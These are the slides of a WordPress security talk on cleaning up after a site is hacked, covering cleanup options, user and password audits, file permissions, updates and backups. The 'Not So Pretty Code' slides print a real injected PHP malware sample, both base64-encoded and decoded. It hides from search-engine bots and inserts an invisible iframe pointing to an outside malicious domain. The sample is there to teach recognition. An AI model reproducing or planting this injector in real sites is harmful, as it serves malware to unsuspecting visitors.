Your Site Has Been Hacked, Now What?

Michele Butcher CantSpeakGeek.com WPSecurityLock.com

@Michele_Butcher

Slides can be found at: http://mlb.pw/WCSD2015

@Michele_Butcher

WordPress Specialist at WP Security Lock

Head Geek at Can’tSpeak Geek

Sometimes a designer of pretty websites and graphics

Southern Illinois Meetup Co-Organizer

Beginners and Intermediate WordPress Instructor at John A Logan College

Michele Butcher

@Michele_Butcher

It all starts one dreadful morning……

@Michele_Butcher

First you see this

@Michele_Butcher

Then you realize this has happened

@Michele_Butcher

Which made you feel like this…

@Michele_Butcher

What do you do when your site gets hacked?

@Michele_Butcher

First option: Pay someone else to clean it.

There are many options out there who will clean your site. Here is who I suggest.

WP Security Lock https://wpsecuritylock.com

Sucuri Security http://sucuri.net/

@Michele_Butcher

Hack Repair http://hackrepair.com

Second Option: Clean it yourself

• Cheapest • Most time consuming • No one knows your site better than you do • You just have to know what to look for

I do not suggest this if you are not comfortable reading HTML, PHP, and CSS. @Michele_Butcher

Pretty Code

@Michele_Butcher

Not So Pretty Code<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX 2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJy wnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd 3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50Jywn YnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ld HNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZH J1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmV zaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGkn KTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1N SIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIi wgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJ yYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQu MjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguM TA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS 4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzM uMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4 LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44O C4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYX koIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU 1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwi NzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3M i4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCS k7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQp mb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxv bmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfa XAybG9uZyA +PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0K Zm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWR VJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn 0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB 4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3 WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY +JzsNCn0='));

@Michele_Butcher

<?php error_reporting(0); $bot = FALSE ; $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api'); $stop_ips_masks = array(

array("216.239.32.0","216.239.63.255"), array("64.68.80.0" ,"64.68.87.255" ), array("66.102.0.0", "66.102.15.255"), array("64.233.160.0","64.233.191.255"), array("66.249.64.0", "66.249.95.255"), array("72.14.192.0", "72.14.255.255"), array("209.85.128.0","209.85.255.255"), array("198.108.100.192","198.108.100.207"), array("173.194.0.0","173.194.255.255"), array("216.33.229.144","216.33.229.151"), array("216.33.229.160","216.33.229.167"), array("209.185.108.128","209.185.108.255"), array("216.109.75.80","216.109.75.95"), array("64.68.88.0","64.68.95.255"), array("64.68.64.64","64.68.64.127"), array("64.41.221.192","64.41.221.207"), array("74.125.0.0","74.125.255.255"), array("65.52.0.0","65.55.255.255"), array("74.6.0.0","74.6.255.255"), array("67.195.0.0","67.195.255.255"), array("72.30.0.0","72.30.255.255"), array("38.0.0.0","38.255.255.255") );

$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR'])); foreach ( $stop_ips_masks as $IPs ) {

$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1])); if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}

} foreach ($user_agent_to_filter as $bot_sign){

if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;} } if (!$bot) { echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>'; } @Michele_Butcher

When cleaning your site, add clean copies of core, your theme and your plugins. It makes cleaning so much

easier.

@Michele_Butcher

This is a good time to make an audit of everything on

your site and delete what is not being used. You can always add other themes

and plugins back later when you need it.

@Michele_Butcher

Now you have all the malware removed, that does not mean we are done

@Michele_Butcher

Change the salts in your wp-config.php file

@Michele_Butcher

Check your users!• You could have unwanted users • Delete the unwanted guests immediately • if you use “admin” as a username, delete it and

make a new user name • Delete all users that are no longer using your

dashboard (Old devs, designers, guests) • Only give others the access they need, not what

they want. A guest blogger should never be an admin, only a contributor.

@Michele_Butcher

Check your FTP accounts on your server

You could have unwanted users here as well

@Michele_Butcher

Check your File Permissions

Files should be 644 Directories should be 755

@Michele_Butcher

Add some Security to your site

• iThemes Security or iThemes Security Pro • Jetpack (BruteProtect and VaultPress) • WordFence • Sucuri Firewall

Some trusted plugins

@Michele_Butcher

Change your login information

• WordPress Logins and passwords

• cPanel Logins and passwords

• Database logins and passwords (Remember to change them in your wp-config.php)

• Hosting Logins and passwords

@Michele_Butcher

When it comes to usernames and passwords, here are a few tips.

• NEVER use “admin” as a username and “password”as the password. NEVER on anything!

• The harder a password is to remember, the harder is to hack

• Use something like LastPass, 1Password, or KeyPass to store your passwords

@Michele_Butcher

What do you do to not get hacked again?

@Michele_Butcher

First and most important!

UPDATEUPDATEUPDATE

Update core, update plugins, update themes!

@Michele_Butcher

A note on updatingIf you use a theme and/or plugin that was

purchased from Envato, Theme Forest, or Code Canyon please mark the box under each

purchased item on the download page to be notified by email of updates. That is the only way

they notify their customers of updates.

This is part of the reason the RevSlider Soak Soak infection was so high.

@Michele_Butcher

Pay attention to WordPress news and security sites• WP Tavern • WP Security Bloggers • Sucuri Blog • WP Security Lock • Advanced WordPress (Facebook) • Twitter

@Michele_Butcher

Only use trusted and supported themes and plugins

Do NOT use a theme or plugin

• That has not been updated in more than a year

• No one is responding in the support forums • If it shows that it does not work in the

current version of core

@Michele_Butcher

Start Making Backups• Backup Buddy

• BackWPUp

• VaultPress (Jetpack)

• Check with your hosting company to see if they do backups as well

• iThemes Security (free and Pro) will do database backups

@Michele_Butcher

Speaking of backups…

Save them somewhere other than your server.

Most have options to send them to an Amazon S3 account, Dropbox, email, or download to

your machine.

@Michele_Butcher

Lastly, be active with your site. You know your site best. If something

does not feel right, look into it. Also, do not ignore your website. No one likes a zombie website.

@Michele_Butcher

And remember…

@Michele_Butcher

Don’t Let Security Make You This Guy!

@Michele_Butcher

Questions?

@Michele_Butcher

Thank you!

Michele Butcher

http://CantSpeakGeek.com

https:WPSecurityLock.com

@Michele_Butcher

Slides can be found at: http://mlb.pw/WCSD2015@Michele_Butcher